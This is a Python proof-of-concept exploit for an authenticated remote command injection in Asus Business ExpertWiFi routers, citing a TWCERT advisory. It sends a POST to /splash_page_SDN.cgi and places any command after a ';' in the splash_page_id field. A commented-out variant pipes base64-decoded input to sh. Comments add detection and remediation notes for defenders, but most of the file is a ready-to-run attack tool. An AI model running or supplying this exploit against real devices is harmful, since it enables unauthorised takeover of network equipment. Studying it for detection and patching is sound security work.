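#!/usr/bin/env python3
# Author: zoeyphoscy
# References:
# https://www.twcert.org.tw/tw/cp-132-7737-1acd0-1.html
# TODO:
# Add ssl support
#
# What this script demonstrates: an authenticated POST to
# /splash_page_SDN.cgi in which the "splash_page_id" form field carries a
# shell command after a ";" separator.
#
# Notes for defenders:
# - The request needs a valid "asus_token" session cookie, so the request
#   is post-authentication; protecting admin sessions and keeping the
#   management interface off untrusted networks narrows exposure.
# - Detection: look for POSTs to /splash_page_SDN.cgi whose body contains
#   "splash_page_id" followed by shell metacharacters such as ";" or "|".
#   The body sent here is a hand-built fragment with no multipart boundary,
#   which is unusual for browser-generated traffic to this endpoint.
# - Remediation: see the referenced TWCERT advisory for affected models and
#   fixed firmware.
# - The token is passed on the command line (visible in shell history and
#   process listings) and is sent over plain http://, so treat it as exposed
#   after a test run and invalidate the session.
import argparse
import requests
import re

# Upper bound, in seconds, on how long the single request may block.
REQUEST_TIMEOUT = 10


def exploit(url, token, command):
    """Send one POST that places *command* inside the splash_page_id field.

    Args:
        url: Full URL of the splash_page_SDN.cgi endpoint.
        token: Value sent as the "asus_token" cookie.
        command: Text interpolated, unescaped, after a ";" in the field.

    Returns:
        None. The HTTP response is not inspected.

    NOTE(review): the PoC presumably relies on the CGI handing this field
    to a shell without sanitising it -- confirm against the advisory.
    """
    cookies = {"asus_token": token}
    # Hand-built form-data fragment; the string is passed to requests as a
    # raw body, so no boundary or Content-Type header is generated for it.
    payload = f"""Content-Disposition: form-data;name="splash_page_id";\n\ntest="aaaa";{command};"""
    #Try uncommenting the following lines if command includes special characters
    #command64 = __import__("base64").b64encode(command.encode()).decode()
    #payload = f"""Content-Disposition: form-data;name="splash_page_id";\n\rtest="aaaa";echo {command64} | base64 -d | sh;"""
    # A timeout keeps an unreachable or hung host from blocking forever.
    requests.post(url, cookies=cookies, data=payload, timeout=REQUEST_TIMEOUT)


def main():
    """Parse the command line, build the endpoint URL and send the request."""
    parser = argparse.ArgumentParser(description="PoC script for Asus Business ExpertWiFi RCE")
    parser.add_argument("--host", required=True, help="Hostname of the target")
    parser.add_argument("--token", required=True, help="Asus login token")
    parser.add_argument("--port", required=False, help="Port number of the host, only required if non-default")
    parser.add_argument("command", help="Your arbitrary command")
    args = parser.parse_args()

    host = args.host
    if args.port:
        host = args.host + ":" + args.port
    # Plain HTTP only (see the TODO above): cookie and body cross the
    # network unencrypted.
    url = "http://" + host + "/splash_page_SDN.cgi"
    exploit(url, args.token, args.command)


# Guarded so that importing this module (e.g. from a test harness or a
# scanner wrapper) never parses argv or sends a request as a side effect.
if __name__ == "__main__":
    main()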